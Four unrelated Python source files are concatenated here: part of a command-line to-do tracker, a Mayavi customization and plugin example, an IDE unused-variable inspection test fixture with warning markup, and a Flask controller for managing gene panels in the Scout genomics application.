do_dict.update({do_data["id"]: do_data}) return do_dict def dodo_unload(final_do_base): content = "" for key, value in sorted(iter(final_do_base.items()), key=lambda key_value: int(key_value[0])): content += "#%s [[%s]] <<%s>> ((%s)) {{%s}}\n" % (value["id"], value["status"], value["time"], value["user"], value["description"]) dodo_write(content, "w") def dodo_init(args): file_name = args.file or DODO_FILE try: try: open(file_name, "r") print("DoDo already exist.") except IOError: file_inst = open(file_name, "w") file_inst.close() print("Successfully initialized DoDo") except IOError: print("Cannot create file in the following location: %s" % file_name) def dodo_write(content, mode="a"): global DODO_FILE, do_base file_inst = open(DODO_FILE, mode) file_inst.write(content) file_inst.close() dodo_list() def dodo_new_id (): if len (do_base) == 0: return "1" else: return str(max(int(id) for id in do_base.keys()) + 1) def dodo_change_status(args, mod_do_base, status): if not args.id: print("ID (-id) can't be empty. May be try creating the task first") return do_entry = mod_do_base.get(args.id) if do_entry: do_entry["status"] = status if args.desc: do_entry["description"] = args.desc if args.user: do_entry["user"] = args.user if args.time: do_entry["time"] = args.time else: if not args.desc: print("Description (-d) can't be empty") return do_id = dodo_new_id () do_description = args.desc do_user = args.user do_time = args.time or time.strftime("%d-%m-%y %H:%M", time.gmtime()) mod_do_base[do_id] = { "id": do_id, "time": do_time, "user": do_user, "status": status, "description": do_description } dodo_unload(mod_do_base) return def dodo_add(args): """ + add/proposed * accepted - rejected # working . complete """ do_user = args.user if args.operation in ["add", "propose", "c"]: if args.id: print("Error: DoDo assigns id for you.") exit() do_id = dodo_new_id () do_description = args.desc do_time = args.time or time.strftime("%d-%m-%y %H:%M", time.gmtime()) do_base[do_id] = { "id": do_id, "time": do_time, "user": do_user, "status": "+", "description": do_description } dodo_unload(do_base) elif args.operation == "accept": dodo_change_status(args, do_base, "*") elif args.operation == "reject": dodo_change_status(args, do_base, "-") elif args.operation == "workon": dodo_change_status(args, do_base, "#") elif args.operation == "finish": dodo_change_status(args, do_base, ".") elif args.operation in ["remove" or "d"]: try: do_base.pop(args.id) except KeyError: print("No task with id %s" % args.id) dodo_unload(do_base) elif args.operation == "flush": for do_entry in list(do_base.values()): if do_entry["status"] in ["-", "."]: do_base.pop(do_entry["id"]) dodo_unload(do_base) return def dodo_list(): global do_base print("%s%sID\tStatus\t\tDate(-t)\tOwner(-u)\t\tDescription (-d)\n%s" % (TerminalColors.BOLD, TerminalColors.UNDERLINE, TerminalColors.END)) for key, value in sorted(iter(do_base.items()), key=lambda key_value1: int(key_value1[0])): color = TerminalColors.YELLOW if value["status"] == ".": color = TerminalColors.GREEN elif value["status"] in ["-", 'x']: color = TerminalColors.RED elif value["status"] == "#": color = TerminalColors.UNDERLINE + TerminalColors.YELLOW elif value["status"] == "+": color = TerminalColors.BLUE user = value["user"] if value["user"] != "None" else "anonymous" human_time = pretty_date(value["time"]) print("%s%s\t[%s]\t\t%s\t(%s)\t\t%s%s" % (color, value["id"], value["status"], human_time, user, value["description"], TerminalColors.END)) print("\n%sAvailable Operations: c accept propose reject workon finish remove d flush\n" \ "Available Options: -id -d(description) -u(user) -t(time) -f(file)\n" \ "Status: + proposed - rejected * accepted # working . complete%s" % ( TerminalColors.BOLD, TerminalColors.END)) def dodo_import(args): """ Sample import JSON format (same as taskwarrior export format) {"id":1,"description":"Read Docs Now","entry":"20150405T020324Z","status":"pending", "uuid":"1ac1893d-db66-40d7-bf67-77ca7c51a3fc","urgency":"0"} """ do_user = args.user json_file = args.input json_source = json.loads(open(json_file).read()) for task in json_source: do_id = dodo_new_id () do_description = task["description"] utc_time = time.strptime(task["entry"], "%Y%m%dT%H%M%S%fZ") do_time = time.strftime("%d-%m-%y %H:%M", utc_time) do_status = "+" if task["status"] == "pending": do_status = "+" if task["status"] == "completed": do_status = "." do_base[do_id] = { "id": do_id, "time": do_time, "user": do_user, "status": do_status, "description": do_description } dodo_unload(do_base) print("Imported %d tasks successfully" % len(json_source)) def dodo_export(args): """ {"id":1,"description":"Read Docs Now","entry":"20150405T020324Z","status":"pending", "uuid":"1ac1893d-db66-40d7-bf67-77ca7c51a3fc","urgency":"0"} Time is in UTC """ dodo_data = [] for instance in sorted(list(do_base.values()), key=lambda value: int(value["id"])): dodo_data.append({ "id": instance["id"], "time": instance["time"], "user": instance["user"], "status": statuses[instance["status"]], "description": instance["description"] } ) if args.output: try: file_name = args.output file_inst = open(file_name, "w") file_inst.write(json.dumps(dodo_data)) file_inst.close() print("%sExported DODO to %s%s" % \ (TerminalColors.GREEN, file_name, TerminalColors.END)) except IOError: print("%sExport failed; Check for permission to create/edit %s%s" % \ (TerminalColors.RED, args.output, TerminalColors.END)) else: print("%sUse -e or --export to <filename.json> to export to a file.%s" % \ (TerminalColors.YELLOW, TerminalColors.END)) print("%s" % TerminalColors.GREEN) print(dodo_data) print("%s" % TerminalColors.END) def dodo_switch(args): global do_base if args.operation == "init": dodo_init(args) elif args.operation in ['add', 'propose', 'accept', 'reject', 'workon', 'finish', 'flush', 'remove', "c", "d"]: dodo_add(args) elif args.operation == 'import': dodo_import(args) elif args.operation == 'export': dodo_export(args) else: dodo_list() if __name__ == "__main__": default_operation = 'list' default_user = os.path.split(os.path.expanduser('~'))[-1] parser = argparse.ArgumentParser() parser.add_argument("operation", nargs='?', default=default_operation, choices=[ 'accept', 'add', 'finish', 'flush', 'list', 'propose', 'reject', 'remove', 'workon' ], help="The operation to perform") parser.add_argument("quick_access", nargs='?', default='', help="Task ID for a operation or Description for the new task") parser.add_argument("-d", "--desc", "--description", help="Task Description") parser.add_argument("-u", "--user", default=default_user, help="User ID") parser.add_argument("-t", "--time", help="Expected/Completed Date - 11-03-2015") parser.add_argument("--id", help="List all existing dodos") parser.add_argument("-f", "--file", help="DODO filename") parser.add_argument("-i", "--input", help="Import from JSON file") parser.add_argument("-o", "--output", help="Export to JSON file") arguments = parser.parse_args() if (arguments.operation == default_operation and not os.path.isfile(arguments.file or DODO_FILE)): parser.print_help() sys.exit(0) quick_access = arguments.quick_access if quick_access: if arguments.quick_access.isdigit(): arguments.id = quick_access elif quick_access: arguments.desc = quick_access global do_base do_base = {} if arguments.operation == "init": dodo_init(arguments) else: do_base = dodo_load(arguments) dodo_switch(arguments)
""" Sample Mayavi customization file. This code is not to be executed as `mayavi2 -x user_mayavi.py` or `python user_mayavi.py`. Put this file in ~/.mayavi2/user_mayavi.py and rerun mayavi2 to see what it does -- the worker view may not show up by default so you will have to go to View->Other and in the Show View dialog, activate the "Custom Mayavi2 View". The added modules should show up in the menus (Look for UserOutline in the Modules) ____ This module demonstrates how to extend Mayavi. It extends the modules provided by mayavi by adding these to the Mayavi registry. Note that the registry imports customize which in turn imports this file. It also defines an Envisage plugin that is added to the default list of plugins to extend the running mayavi application. This plugin is returned by the `get_plugins()` function. This file must be placed inside the `~/.mayavi2` directory and called `user_mayavi.py`. Please note that `~/.mayavi2` is placed in `sys.path` (if the directory exists) so make sure that you choose your module names carefully (so as not to override any common module names). The file may also be placed anywhere on sys.path and called `site_mayavi.py` for global system level customizations. """ # Author: Prabhu Ramachandran <prabhu@aero.iitb.ac.in> # Copyright (c) 2006-2008, Enthought, Inc. # License: BSD Style. from mayavi.core.registry import registry from mayavi.core.pipeline_info import PipelineInfo from mayavi.core.metadata import ModuleMetadata # Metadata for the new module we want to add -- notice that we use a # factory function here for convenience, we could also use a class but # the reasons for doing this are documented below. user_outline = ModuleMetadata( id = "UserOutlineModule", menu_name = "&UserOutline", factory = 'user_mayavi.user_outline', desc = "Draw a cornered outline for given input", tooltip = "Draw a cornered outline for given input", help = "Draw a cornered outline for given input", input_info = PipelineInfo(datasets=['any'], attribute_types=['any'], attributes=['any']) ) # Register the module with the mayavi registry. registry.modules.append(user_outline) ####### # The all important function that returns the plugin we wish to add to # the default mayavi application. def get_plugins(): # We simply return a list containing the WorkerPlugin defined below. return [WorkerPlugin()] ###################################################################### # Thats it, basically. The rest of the code should really be in another # module but is in the same module for convenience here. There are # problems with doing any significant non-core module imports in this # module as documented below. ###################################################################### ###################################################################### # THE CODE BELOW SHOULD REALLY BE IN SEPARATE MODULES. # # The following can very well be in a separate module but I've kept it # here to make this a compact demo of how to customize things. ###################################################################### ###################################################################### # A new module to expose to mayavi. # # WARNING: Do not do other mayavi imports right here like for example: # 'from mayavi.modules.outline import Outline' etc. This is # because the user_mayavi is imported at a time when many of the imports # are not complete and this will cause hard-to-debug circular import # problems. The registry is given only metadata mostly in the form of # strings and this will cause no problem. Therefore to define new # modules, we strongly recommend that the modules be defined in another # module or be defined in a factory function as done below. def user_outline(): """A Factory function that creates a new module to add to the pipeline. Note that the method safely does any mayavi imports inside avoiding any circular imports. """ print("User Outline") from mayavi.modules.outline import Outline o = Outline(outline_mode='cornered', name='UserOutline') return o ###################################################################### # This code simulates something the user would like to do. In this case # we just want to create some data, view it with mayavi and modify the # data. We want to add this as a view to the standard mayavi. The code # below is simply traits code with a few extra things to be able to grab # the running mayavi instance and script it. The object we create we # offer as an envisage service offer -- this instantiates the worker. # The WorkerPlugin exposes the service offer and shows the view of this # worker. import numpy from traits.api import HasTraits, Range, Button, Instance, List from traitsui.api import Item, View ###################################################################### # `Worker` class ###################################################################### class Worker(HasTraits): """This class basically allows you to create a data set, view it and modify the dataset. This is a rather crude example but demonstrates how things can be done. """ # Set by envisage when this is contributed as a ServiceOffer. window = Instance('pyface.workbench.api.WorkbenchWindow') create_data = Button('Create data') reset_data = Button('Reset data') view_data = Button('View data') scale = Range(0.0, 1.0) source = Instance('mayavi.core.source.Source') # Our UI view. view = View(Item('create_data', show_label=False), Item('view_data', show_label=False), Item('reset_data', show_label=False), Item('scale'), resizable=True ) def get_mayavi(self): from mayavi.plugins.script import Script return self.window.get_service(Script) def _make_data(self): dims = [64, 64, 64] np = dims[0]*dims[1]*dims[2] x, y, z = numpy.ogrid[-5:5:dims[0]*1j,-5:5:dims[1]*1j,-5:5:dims[2]*1j] x = x.astype('f') y = y.astype('f') z = z.astype('f') s = (numpy.sin(x*y*z)/(x*y*z)) s = s.transpose().copy() # This makes the data contiguous. return s def _create_data_fired(self): mayavi = self.get_mayavi() from mayavi.sources.array_source import ArraySource s = self._make_data() src = ArraySource(transpose_input_array=False, scalar_data=s) self.source = src mayavi.add_source(src) def _reset_data_fired(self): self.source.scalar_data = self._make_data() def _view_data_fired(self): mayavi = self.get_mayavi() from mayavi.modules.outline import Outline from mayavi.modules.image_plane_widget import ImagePlaneWidget # Visualize the data. o = Outline() mayavi.add_module(o) ipw = ImagePlaneWidget() mayavi.add_module(ipw) ipw.module_manager.scalar_lut_manager.show_scalar_bar = True ipw_y = ImagePlaneWidget() mayavi.add_module(ipw_y) ipw_y.ipw.plane_orientation = 'y_axes' def _scale_changed(self, value): src = self.source data = src.scalar_data data += value*0.01 numpy.mod(data, 1.0, data) src.update() ###################################################################### # The following code is the small amount of envisage code that brings # the users code (above) and Envisage/Mayavi UI together. from envisage.api import Plugin, ServiceOffer ###################################################################### # `WorkerPlugin` class ###################################################################### class WorkerPlugin(Plugin): # Extension point Ids. SERVICE_OFFERS = 'envisage.ui.workbench.service_offers' VIEWS = 'envisage.ui.workbench.views' # Services we contribute. service_offers = List(contributes_to=SERVICE_OFFERS) # Views. views = List(contributes_to=VIEWS) ###################################################################### # Private methods. def _service_offers_default(self): """ Trait initializer. """ worker_service_offer = ServiceOffer( protocol = 'user_mayavi.Worker', factory = 'user_mayavi.Worker' ) return [worker_service_offer] def _views_default(self): """ Trait initializer. """ return [self._worker_view_factory] def _worker_view_factory(self, window, **traits): """ Factory method for the current selection of the engine. """ from pyface.workbench.traits_ui_view import \ TraitsUIView worker = window.get_service(Worker) tui_worker_view = TraitsUIView(obj=worker, view='view', id='user_mayavi.Worker.view', name='Custom Mayavi2 View', window=window, position='left', **traits ) return tui_worker_view # END OF CODE THAT SHOULD REALLY BE IN SEPARATE MODULES. ###################################################################### if __name__ == '__main__': import sys print("*"*80) print("ERROR: This script isn't supposed to be executed.") print(__doc__) print("*"*80) from traits.util.home_directory import get_home_directory print("Your .mayavi2 directory should be in %s"%get_home_directory()) print("*"*80) sys.exit(1)
def foo1(): <weak_warning descr="Local variable 'aaa' value is not used">aaa</weak_warning> = 1 #fail <weak_warning descr="Local variable 'aaa' value is not used">aaa</weak_warning> = 2 #fail bbb = 1 #pass return bbb def bar(<weak_warning descr="Parameter 'self' value is not used">self</weak_warning>): #fail print("Foo") def baz(<weak_warning descr="Parameter 'a' value is not used">a</weak_warning>): #fail a = 12 print(a) def boo(): <weak_warning descr="Local variable 'k' value is not used">k</weak_warning> = 1 #fail [k for k in [1,3] if True] <weak_warning descr="Local variable 'i' value is not used">i</weak_warning> = 1 #fail for i in [1,2]: print(i) <weak_warning descr="Local variable 'j' value is not used">j</weak_warning> = 1 #fail for j in [-2, -1]: print(j) print (j) class A: def foo(self): #pass pass def baa(): foo.bar = 123 #pass def bla(x): #pass def _bar(): print x return _bar def main(): foo = "foo" #pass bar = "bar" #pass baz = "baz" #pass print "%(foo)s=%(bar)s" % locals() def bar(arg): #pass foo = 1 #pass def <weak_warning descr="Local function 'test' is not used">test</weak_warning>(): #fail print arg return foo #pass class FooBar: @classmethod def foo(cls): #pass pass args[0] = 123 # pass def bzzz(): for _ in xrange(1000): # pass pass def do_something(local_var): global global_var global_var = local_var # pass def srange(n): return {i for i in range(n)} def test_func(): return {(lambda i=py1208: i) for py1208 in range(5)} def foo(): status = None #pass try: status = open('/proc/self/status', 'r') finally: if status is not None: status.close() foo = lambda <weak_warning descr="Parameter 'x' value is not used">x</weak_warning>: False class MySuperClass: def shazam(self, param1, param2): pass class MySubClass(MySuperClass): def shazam(self, param1, param2): pass def test_func(): items = {(lambda i=i: i) for i in range(5)} #pass return {x() for x in items} class MyType(type): def __new__(cls, name, bases, attrs): #pass if name.startswith('None'): return None return super(MyType, cls).__new__(cls, name, bases, newattrs) def foo(cls): #fail pass def test(): d = dict() v = 1 #pass try: v = d['key'] except KeyError: v = 2 finally: print v def foo(<weak_warning descr="Parameter 'a' value is not used">a = 123</weak_warning>): # fail Do not use getText() as parameter name print('hello') def loopie(): for x in range(5): pass def locals_inside(): now = datetime.datetime.now() # pass do_smth_with(locals()) class Stat(object): @staticmethod def woof(<weak_warning descr="Parameter 'dog' value is not used">dog="bark"</weak_warning>): # fail print('hello') class A: def __init__(self, *args): #pass self.args = [] for a in args: self.args.append(a) # PY-2574 def f(): # x in "for" is actually used in "if" return [0 for x in range(10) if x] #pass # PY-3031 def f(): # n doesn't leak from the generator expression, so this n is used n = 1 #pass expr = (n for n in xrange(10)) print n return expr # PY-3118 def f(x): # Both y values in "if" can be used later in g, so the first one shouldn't be marked as unused if x: y = 0 #pass else: y = 1 #pass def g(): return y return g # PY-3076 def f(): # Both x values could be used inside g (because there is no inter-procedural CFG) x = 'foo' #pass x = 'bar' #pass def g(): return x x = 'baz' #pass return g # PY-2418 def f(x): # The list shouldn't be marked as unused if isinstance(x, [tuple, list]): #pass pass # PY-3550 def f(): z = 2 #pass def g(z=z): return z return g # PY-4151 def f(g): x = 1 #pass try: x = g() except Exception: pass else: pass print(x) # PY-4154 def a1(): <weak_warning descr="Local variable 'a' value is not used">a</weak_warning> = 1 #fail try: a = 2 except Exception: a = 3 print(a) # PY-4157 def f(g): x = 1 #pass try: pass except Exception: pass else: x = g() print(x) # PY-4147 def f(x, y, z): class C: foo = x #pass def h(self): return z def g(): return y return C, g # PY-4378 def f(c): try: x = c['foo'] except KeyError: if c: x = 42 #pass else: raise except Exception: raise return x # PY-5755 def test_same_named_variable_inside_class(): a = 1 #pass class C: def a(self): print(a) return C # PY-5086 def test_only_name_in_local_class(): x = 1 class <weak_warning descr="Local class 'C' is not used">C</weak_warning>: pass return x # PY-7028 class C: def test_unused_params_in_empty_method_1(self, x, y, z): pass def test_unused_params_in_empty_method_2(self, x, y, z): raise Exception() def test_unused_params_in_empty_method_3(self, x, y, z): """Docstring.""" def test_unused_params_in_empty_method_4(self, x, y, z): """Docstring.""" raise Exception() def test_unused_params_in_empty_method_5(self, x, y, z): """Docstring.""" return # PY-7126 def test_unused_empty_function(<weak_warning descr="Parameter 'x' value is not used">x</weak_warning>): pass # PY-7072 def test_unused_variable_in_cycle(x, c): while x > 0: x = x - 1 #pass if c: break # PY-7517 def test_unused_condition_local_with_last_if_in_cycle(c): x = True while x: x = False #pass if c: x = True # PY-7527 def test_unused_empty_init_parameter(): class C(object): def __init__(self, <weak_warning descr="Parameter 'foo' value is not used">foo</weak_warning>): pass def f(self, bar): pass return C # PY-14429 def test_used_local_augmented_assignment(x, y): x += y # PY-19492 class A: def __exit__(self, exc_type, exc_val, exc_tb): print(exc_type) def __eq__(self, other): return False
# -*- coding: utf-8 -*- import datetime as dt import logging from flask import flash, redirect from flask_login import current_user from scout.build.panel import build_panel from scout.parse.panel import parse_genes LOG = logging.getLogger(__name__) INHERITANCE_MODELS = ["ar", "ad", "mt", "xr", "xd", "x", "y"] def shall_display_panel(panel_obj, user): """Check if panel shall be displayed based on display status and user previleges.""" is_visible = not panel_obj.get("hidden", False) return is_visible or panel_write_granted(panel_obj, user) def panel_write_granted(panel_obj, user): return any( ["maintainer" not in panel_obj, user.is_admin, user._id in panel_obj.get("maintainer", [])] ) def panel_decode_lines(panel_file): """Returns a provided gene panel file as single lines Accepts: panel_file (werkzeug.datastructures.FileStorage) Returns: lines(list): list of lines present in gene panel uploaded using the form """ content = panel_file.stream.read() lines = None try: # Try to read the csv or txt file containing genes info if b"\n" in content: lines = content.decode("utf-8-sig", "ignore").split("\n") else: lines = content.decode("windows-1252").split("\r") except Exception as err: flash( "Something went wrong while parsing the panel gene panel file! ({})".format(err), "danger", ) return lines def create_new_panel(store, request, lines): """Create a new gene panel with the data provided using the form Args: store(scout.adapter.MongoAdapter) request(flask.request) request sent by browser form to the /panels endpoint lines(list): list of lines containing gene data Returns: new_panel_id(str): the _id a newly created panel """ new_panel_name = request.form.get("new_panel_name") new_panel_id = new_panel( store=store, institute_id=request.form["institute"], panel_name=new_panel_name, display_name=request.form["display_name"] or new_panel_name.replace("_", " "), csv_lines=lines, maintainer=[current_user._id], description=request.form["description"], ) if new_panel_id is None: return None flash("New gene panel added: {}!".format(new_panel_name), "success") return new_panel_id def update_existing_panel(store, request, lines): """Update an existing panel by replacing its genes of adding genes to the existing ones Args: store(scout.adapter.MongoAdapter) request(flask.request) request sent by browser form to the /panels endpoint lines(list): list of lines containing gene data Returns: panel_obj.get("_id") (str): the _id of the panel the used is editing """ panel_name = request.form["panel_name"] update_option = request.form["modify_option"] panel_obj = store.gene_panel(panel_name) if panel_obj is None: return None if panel_write_granted(panel_obj, current_user): panel_obj = update_panel( store=store, panel_name=panel_name, csv_lines=lines, option=update_option, ) else: flash( "Permission denied: please ask a panel maintainer or admin for help.", "danger", ) return panel_obj.get("_id") def panel_create_or_update(store, request): """Process a user request to create a new gene panel Args: store(scout.adapter.MongoAdapter) request(flask.request) request sent by browser form to the /panels endpoint Returns: redirect_id(str): the ID of the panel to redirect the page to """ redirect_id = None panel_file = request.files["panel_file"] lines = panel_decode_lines(panel_file) if not lines: return redirect(request.referrer) # check if a new panel should be created or the user is modifying an existing one if request.form.get("new_panel_name"): # Create a new panel redirect_id = create_new_panel(store, request, lines) else: # Update an existing panel redirect_id = update_existing_panel(store, request, lines) return redirect_id def panel(store, panel_obj): """Preprocess a panel of genes.""" panel_obj["institute"] = store.institute(panel_obj["institute"]) full_name = "{} ({})".format(panel_obj["display_name"], panel_obj["version"]) panel_obj["name_and_version"] = full_name maintainers = panel_obj.get("maintainer") or [] panel_obj["maintainer_names"] = [ maintainer_obj.get("name") for maintainer_obj in (store.user(user_id=maintainer_id) for maintainer_id in maintainers) if maintainer_obj is not None ] return dict(panel=panel_obj) def existing_gene(store, panel_obj, hgnc_id): """Check if gene is already added to a panel.""" existing_genes = {gene["hgnc_id"]: gene for gene in panel_obj.get("genes", {})} return existing_genes.get(hgnc_id) def update_panel(store, panel_name, csv_lines, option): """Update an existing gene panel with genes. Args: store(scout.adapter.MongoAdapter) panel_name(str) csv_lines(iterable(str)): Stream with genes option(str): 'add' or 'replace' Returns: panel_obj(dict) """ new_genes = [] panel_obj = store.gene_panel(panel_name) if panel_obj is None: return None # retroactively add hidden field if not "hidden" in panel_obj: panel_obj["hidden"] = False try: new_genes = parse_genes(csv_lines) # a list of gene dictionaries containing gene info except SyntaxError as error: flash(error.args[0], "danger") return None # if existing genes are to be replaced by those in csv_lines if option == "replace": # all existing genes should be deleted for gene in panel_obj["genes"]: # create extra key to use in pending actions: gene["hgnc_symbol"] = gene["symbol"] store.add_pending(panel_obj, gene, action="delete", info=None) for new_gene in new_genes: if not new_gene["hgnc_id"]: flash("gene missing hgnc id: {}".format(new_gene["hgnc_symbol"]), "danger") continue gene_obj = store.hgnc_gene_caption(new_gene["hgnc_id"]) if gene_obj is None: flash( "gene not found: {} - {}".format(new_gene["hgnc_id"], new_gene["hgnc_symbol"]), "danger", ) continue if new_gene["hgnc_symbol"] and gene_obj["hgnc_symbol"] != new_gene["hgnc_symbol"]: flash( "symbol mis-match: {0} | {1}".format( gene_obj["hgnc_symbol"], new_gene["hgnc_symbol"] ), "warning", ) info_data = { "disease_associated_transcripts": new_gene["transcripts"], "reduced_penetrance": new_gene["reduced_penetrance"], "mosaicism": new_gene["mosaicism"], "inheritance_models": new_gene["inheritance_models"], "database_entry_version": new_gene["database_entry_version"], } if ( option == "replace" ): # there will be no existing genes for sure, because we're replacing them all action = "add" else: # add option. Add if genes is not existing. otherwise edit it existing_genes = {gene["hgnc_id"] for gene in panel_obj["genes"]} action = "edit" if gene_obj["hgnc_id"] in existing_genes else "add" store.add_pending(panel_obj, gene_obj, action=action, info=info_data) return panel_obj def new_panel( store, institute_id, panel_name, display_name, csv_lines, maintainer=None, description=None, ): """Create a new gene panel. Args: store(scout.adapter.MongoAdapter) institute_id(str) panel_name(str) display_name(str) csv_lines(iterable(str)): Stream with genes maintainer(list(user._id)) description(str) Returns: panel_id: the ID of the new panel document created or None """ institute_obj = store.institute(institute_id) if institute_obj is None: flash("{}: institute not found".format(institute_id)) return None panel_obj = store.gene_panel(panel_name) if panel_obj: flash( "panel already exists: {} - {}".format( panel_obj["panel_name"], panel_obj["display_name"] ), "danger", ) return None LOG.debug("parse genes from CSV input") try: new_genes = parse_genes(csv_lines) except SyntaxError as error: flash(error.args[0], "danger") LOG.debug("Ooops!") return None LOG.debug("build new gene panel") panel_id = None try: panel_data = build_panel( dict( panel_name=panel_name, institute=institute_obj["_id"], version=1.0, maintainer=maintainer, date=dt.datetime.now(), display_name=display_name, description=description, genes=new_genes, hidden=False, ), store, ) panel_id = store.add_gene_panel(panel_data) except Exception as err: flash(str(err), "danger") return panel_id def panel_export(store, panel_obj): """Preprocess a panel of genes.""" panel_obj["institute"] = store.institute(panel_obj["institute"]) full_name = "{}({})".format(panel_obj["display_name"], panel_obj["version"]) panel_obj["name_and_version"] = full_name return dict(panel=panel_obj) def get_panels(store, panel_name): """Fetch matching gene panels and return a list.""" gene_panels = list(store.gene_panels(panel_id=panel_name, include_hidden=True)) return gene_panels